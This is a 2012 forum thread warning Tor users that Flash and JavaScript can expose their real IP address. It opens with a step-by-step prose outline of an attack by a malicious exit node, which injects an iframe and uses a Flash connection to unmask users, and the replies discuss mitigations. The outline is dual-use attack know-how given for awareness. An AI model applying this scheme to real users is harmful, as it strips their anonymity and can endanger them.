Bitcoin Forum
December 04, 2016, 10:16:22 AM *
News: To be able to use the next phase of the beta forum software, please ensure that your email address is correct/functional.
 
   Home   Help Search Donate Login Register  
Pages: [1]
  Print  
Author Topic: TOR users be aware, Flash and Javascript reveals IP address.  (Read 15722 times)
Serith
Sr. Member
****
Offline Offline

Activity: 269


View Profile
April 25, 2012, 05:20:13 PM
 #1

The following sequence of events occurs when somebody is unmasked:

  • VictimHost connects through MyTorNode, to SomeWebSite
  • MyTorNode changes outbound traffic to SomeWebSite so that HTTP1.0 and gzip compression are not used (HTTO headers are stripped / changed)
  • MyTorNode replaces inbound traffic from SomeWebSite, inserting and <iframe> reference to MyEvilWebServer. This  reference also contains a recognizable Cookie
  • MyEvilWebServer receives request via Tor from VictimHost, including Cookie, serves up Trigger. Trigger contains:
    • Javascript code that requests "/VictimHostName_VictimHostIP.gif" from MyEvilWebServer
    • A Shockwave Flash Movie that makes a direct connection to MyEvilWebserver (since Flash doesn't support / know about Tor / proxies / etc, this will be a direct connection)
  • Javascript executing on VictimHost makes VictimHost connects via Tor and request /VictimHostName_VictimHostIP.gif
  • Shockwave flash executing on VictimHost connects directly, without Tor, and resends the Cookie, allowing mapping between the original page being browsed via Tor, and the real VictimHostIP


Discussion of the vulnerability:
Hacker News: The Underpants Project
1480846582
Hero Member
*
Offline Offline

Posts: 1480846582

View Profile Personal Message (Offline)

Ignore
1480846582
Reply with quote  #2

1480846582
Report to moderator
1480846582
Hero Member
*
Offline Offline

Posts: 1480846582

View Profile Personal Message (Offline)

Ignore
1480846582
Reply with quote  #2

1480846582
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
Red Emerald
Hero Member
*****
Offline Offline

Activity: 742



View Profile WWW
April 25, 2012, 05:23:07 PM
 #2

Good information, but not new news at all.  This is why the Tor Browser Bundle and Tails have javascript and flash disabled by default.

mila
Sr. Member
****
Offline Offline

Activity: 462



View Profile
April 25, 2012, 05:32:42 PM
 #3

no kidding, Sherlock?

I mean, thank you for rising awareness but it's really well known or at least documented and the bundled browser has the settings right by default.

your ad here:
Red Emerald
Hero Member
*****
Offline Offline

Activity: 742



View Profile WWW
April 25, 2012, 05:35:56 PM
 #4

Also, http://panopticlick.eff.org/ is a much more informative page than your link.

Serith
Sr. Member
****
Offline Offline

Activity: 269


View Profile
April 25, 2012, 06:07:18 PM
 #5

no kidding, Sherlock?

I mean, thank you for rising awareness but it's really well known or at least documented and the bundled browser has the settings right by default.

Any link on this forum that I missed?
Red Emerald
Hero Member
*****
Offline Offline

Activity: 742



View Profile WWW
April 25, 2012, 06:14:52 PM
 #6

no kidding, Sherlock?

I mean, thank you for rising awareness but it's really well known or at least documented and the bundled browser has the settings right by default.

Any link on this forum that I missed?
Well there are warnings on the actual tor download page.

https://www.torproject.org/download/download-easy.html.en#warning

a nice guy
Newbie
*
Offline Offline

Activity: 27


View Profile
April 25, 2012, 06:50:06 PM
 #7

Hello,

just setup a vm or real hardware working as a proxy to route all the traffic from eth0(internal network) to eth1(external network).
eth1 routes then all traffic through tor.
Now setup a 2nd vm which has only one port directly connected to eth0 on the proxy.
ALL traffic is now routed through tor and immune to those attacks.

I think there is a tutorial on the torwiki too.

kind regards,
a nice guy

1PqBH6NWFBhbVF7Srw5ZYGtmLcya1aaw9g
security audits (http://bitcointalk.org/index.php?topic=75684)
pgp: 0x77DA3A9A @ pgp.mit.edu (http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x83F5BD9E77DA3A9A)
theymos
Administrator
Legendary
*
Offline Offline

Activity: 2492


View Profile
April 25, 2012, 07:14:55 PM
 #8

You can't do it with just JavaScript, which is why torbutton allows JavaScript. You need a plugin like Flash.

1NXYoJ5xU91Jp83XfVMHwwTUyZFK64BoAD
Red Emerald
Hero Member
*****
Offline Offline

Activity: 742



View Profile WWW
April 25, 2012, 08:25:50 PM
 #9

Hello,

just setup a vm or real hardware working as a proxy to route all the traffic from eth0(internal network) to eth1(external network).
eth1 routes then all traffic through tor.
Now setup a 2nd vm which has only one port directly connected to eth0 on the proxy.
ALL traffic is now routed through tor and immune to those attacks.

I think there is a tutorial on the torwiki too.

kind regards,
a nice guy
https://trac.torproject.org/projects/tor/wiki/doc/TorBOX

cryptoanarchist
Hero Member
*****
Offline Offline

Activity: 896



View Profile
April 26, 2012, 03:55:22 PM
 #10

Wow...if you didn't know this before doing something illegal on the internet, maybe crime isn't your thing.
Red Emerald
Hero Member
*****
Offline Offline

Activity: 742



View Profile WWW
April 26, 2012, 05:57:53 PM
 #11

Wow...if you didn't know this before doing something illegal on the internet, maybe crime isn't your thing.
Tor and illegal actions do not at all have to be connected.  There are plenty of legitimate reasons for usage of Tor.

I don't like when people automatically assume anonymity is only needed for illegal purposes.  I don't want to live in that world.

Xenland
Legendary
*
Offline Offline

Activity: 980


I'm not just any shaman, I'm a Sha256man


View Profile
April 29, 2012, 02:15:22 AM
 #12

Every poster above or below this post should be considered a terrorist
I didn't know this, thanks for the post OP.

a nice guy
Newbie
*
Offline Offline

Activity: 27


View Profile
May 01, 2012, 08:49:52 AM
 #13

Every poster above or below this post should be considered a terrorist

Is this a bad or a good thing? Cheesy

1PqBH6NWFBhbVF7Srw5ZYGtmLcya1aaw9g
security audits (http://bitcointalk.org/index.php?topic=75684)
pgp: 0x77DA3A9A @ pgp.mit.edu (http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x83F5BD9E77DA3A9A)
Tuxavant
Hero Member
*****
Offline Offline

Activity: 756


Bitcoin Mayor of Las Vegas


View Profile WWW
May 01, 2012, 02:18:55 PM
 #14

I don't like disclosing TTPs, but if you put more than a few brain cells on this problem, it's pretty easy to mitigate it.

Generation Bitcoin | G+ | FB | Bitcoins In Vegas | CoinBus.com | TOR Exit Operator 1MVTPATVCKBMfALRHJsXpHfKJu7GyL7nAc
Tuxavant
Hero Member
*****
Offline Offline

Activity: 756


Bitcoin Mayor of Las Vegas


View Profile WWW
May 01, 2012, 03:30:07 PM
 #15

But it really sucks when anonymity is sometimes needed. Talking about some politics where I live can get you 15 years in jail.

WAY too many laws to break now aday... Tell someone is a jerk from with Arizona Internet connection and you go to jail. WTF. There is no such thing as a "law abiding citizen" any longer.

Generation Bitcoin | G+ | FB | Bitcoins In Vegas | CoinBus.com | TOR Exit Operator 1MVTPATVCKBMfALRHJsXpHfKJu7GyL7nAc
Pages: [1]
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!